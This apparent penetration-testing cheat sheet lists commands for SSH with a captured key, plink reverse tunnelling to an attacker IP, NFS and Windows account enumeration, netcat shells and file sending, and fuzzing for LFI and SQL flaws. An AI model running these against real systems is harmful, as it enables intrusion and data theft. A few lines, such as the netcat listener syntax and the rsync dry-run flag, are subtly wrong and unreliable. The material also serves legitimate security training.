Quick Scripts

Quick Snippets to use in a pinch

SSH

Using a id_rsa to login to a target, Do note you must have the password for the id_rsa for this to work

ssh -i id_rsa User@IP

SCP

SCP is a great method of transferring files to and from the target in a pinch

scp  User@IP:~/Dir ~/LocalDir

scp LocalFile User@IP:~/RemoteDir/File

PLINK

Plink is a tool that's part of the putty suite, it allows for ssh tunneling and in our use cases port forwarding. Once plink is on the target we first find the port we want to forward

netstat -ano

and then forward the port to our machine which should have a ssh profile setup

.\plink.exe -l AttackerMachineUserName -pw AttackerMachinePassword -R TargetMachinePort:127.0.0.1:AttackMachinePort AttackMachineIP
.\plink.exe -l hn -pw hn -R 5985:127.0.0.1:5985 10.10.10.10

NFS Mounts

NFS Mounts can sometimes be found on targets and can provide essential information about the target

They are often found on port

PORT    STATE SERVICE
111/tcp open  rpcbind

Enumeration

showmount -e IP #List Mounts
nmap -sV --script=nfs-showmount IP #Nmap List Mounts
nmap -sV --script=nfs-statfs IP #Nmap get mount statistics
nmap -sV --script=nfs-ls IP #Nmap list mounts and permissions

Local Mount

NFS Mounts can also be mounted locally

mount -t nfs IP:/NFSMountName /LocalMountLocation
mount #Lists locally mounted directories
umount IP:/NFSMountName #unmounts mounted NFS Directory

NFS Mounts can often be huge and take a bit of time to transfer data (especially in a turbulent network) as such it's advisable to use rsync to pull files available on it down

rsync -anv /NFSMountLocation/ /LocalExistingDir

Powershell

Powershell Console History

C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\

Powershell is a very useful and powershell scripting language akin to bash more information about it's utilities can be found on https://docs.microsoft.com/en-us/powershell/module/

CMD

Output file content

type filename.txt

Other Useful Commands (these commands work on powershell as well)

dir /a #list files with full atributes including hidden
cmd /k #useful inline with payloads, runs & keeps payload alive
whoami /priv #whoami?
net user #list accounts
net user %USERNAME% #information about current account
net group #view Domain Groups

NetCat

Netcat is tool that allows for simple shells

nc -lnvp IP PORT #start netcat listener
nc IP PORT #use netcat to connect to a defined target

Netcat unfortunately isn't native on windows but we can still get it from https://eternallybored.org/misc/netcat/ and it works the same way!

Netcat can also be used for transferring files

nc -l -p 1234 > out.file #receiver
cat file | nc -w 3 IP PORT #sender

Fuzzing

Fuzzing is very useful for finding files that has a explicit name but no given explicit location, we can use fuzzing to find the given path using a pre-exisiting URL, fuzzing can also be used for exploiting LFI as well as SQL vulnerabilities

wfuzz -c -w 'wordlist' -u 'http://IP/file.php?id=FUZZ'

ffuf -u http://IP/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc
200,204,301,302,307,401 -o results.txt

DirBusting

Dirbusting can be considered a form of fuzzing but checks for whole directories and files, one such tool we can use for this is GoBuster

gobuster dir -u http://IP/ -w DirBuster-Lists/directory-list-2.3-medium.txt

Python

Simple Http server for a quick host

python -m SimpleHTTPServer 8088

C#

C# binaries can be decompiled with dnspy https://github.com/0xd4d/dnSpy and can be compiled with https://dotnetfiddle.net/